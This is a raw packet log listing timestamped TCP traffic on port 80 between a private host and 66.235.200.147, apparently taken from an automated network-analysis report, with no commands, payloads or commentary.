Dec 5, 2022 01:32:31.581906080 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.581914902 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.581945896 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.581970930 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.581975937 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.582009077 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.582031965 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.586406946 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586446047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586474895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586498976 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.586503029 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586533070 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586539030 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.586563110 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586587906 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.586591005 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586621046 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586647034 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.586651087 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586679935 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586703062 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.586750984 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586810112 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.586828947 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586857080 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586903095 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586910009 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.586932898 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586962938 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.586988926 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.586992025 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587023020 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587047100 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.587060928 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587085962 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587111950 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.587665081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587697029 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587726116 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587739944 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.587757111 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587779045 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.587788105 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587819099 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587841034 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.587848902 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587877989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587898970 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.587907076 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587935925 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.587954998 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.588601112 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.588638067 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.588670015 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.588695049 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.588701010 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.588722944 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.588733912 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.588764906 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.588787079 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.588798046 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.588829994 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.588850975 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.588860989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.588892937 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.588912964 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.589515924 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.589550972 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.589582920 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.589589119 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.589615107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.589633942 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.589658022 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.589689970 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.589709997 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.589770079 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.589799881 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.589827061 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.589827061 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.589853048 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.589890003 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.590441942 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.590472937 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.590501070 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.590509892 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.590531111 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.590550900 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.590560913 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.590590000 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.590617895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.590619087 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.590646029 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.590671062 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.590676069 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.590703964 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.590725899 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.591377020 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.591408968 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.591439009 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.591444016 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.591468096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.591489077 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.591499090 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.591527939 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.591546059 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.591557026 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.591584921 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.591614008 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.591617107 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.591634989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.591664076 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.642453909 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.717803955 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.134208918 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.151597023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.153259993 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.217515945 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.234764099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.234937906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.235178947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.252185106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.849916935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.849978924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850024939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850066900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850096941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.850109100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850152016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850157976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.850194931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850214005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.850236893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850279093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850320101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850327969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.850359917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850369930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.850404978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850768089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850810051 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850830078 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.850852013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.850857973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.850919962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.851296902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.851341009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.851361036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.851382017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.851399899 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.851423025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.852129936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.852175951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.852191925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.852217913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.852226019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.852261066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.852912903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.852956057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.852972031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.852998018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.853005886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.853041887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.853722095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.853765011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.853831053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.853863955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.867615938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.867691994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.867737055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.867779970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.867820978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.867862940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.867877007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.867877007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.867904902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.867944956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.867947102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.868000984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.868532896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.868577003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.868618965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.868627071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.869151115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.869194031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.869235992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.869246006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.869276047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.869287968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.869930029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.869975090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.869995117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.870021105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.870062113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.870112896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.870794058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.870836973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.870863914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.870897055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.870943069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.871005058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.871644974 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.871689081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.871728897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.871759892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.871769905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.871781111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.872355938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.872399092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.872438908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.872459888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.872479916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.872483969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.873193979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.873236895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.873276949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.873300076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.873317957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.873320103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.873969078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.874192953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.874237061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.874257088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.874275923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:36.874280930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:36.971056938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.276674032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.293807030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.607445002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.607501984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.607544899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.607583046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.607588053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.607624054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.607664108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.607692003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.607702017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.607713938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.607742071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.607779980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.607819080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.607832909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.607863903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.608567953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.608613014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.608652115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.608689070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.608690023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.608730078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.608747959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.609450102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.609493971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.609533072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.609539032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.609574080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.609601021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.609612942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.609751940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.610384941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.610429049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.610467911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.610506058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.610523939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.610543013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.610544920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.611325979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.611366034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.611403942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.611409903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.611442089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.611479998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.611489058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.611522913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.612308025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.612355947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.612399101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.612437010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.612456083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.612478018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.612481117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.613126040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.613168955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.613208055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.613213062 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.613245010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.613253117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.613282919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.613343954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.614123106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.614166975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.614203930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.614240885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.614243031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.614288092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.614341974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.614950895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.614993095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.615032911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.615032911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.615071058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.615076065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.615111113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.615338087 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.624793053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.624836922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.624890089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.624959946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.624994040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.625001907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.625040054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.625051022 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.625082970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.625083923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.625122070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.625241041 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.625900030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.625943899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.625983000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.626020908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.626029968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.626070023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.626079082 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.626792908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.626835108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.626873016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.626899004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.626928091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.626930952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.626967907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.627805948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.627810001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.627861023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.627899885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.627962112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.628293037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.628348112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.628359079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.628401041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.628451109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.628501892 CET	80	49705	66.235.200.147	192.168.2.3
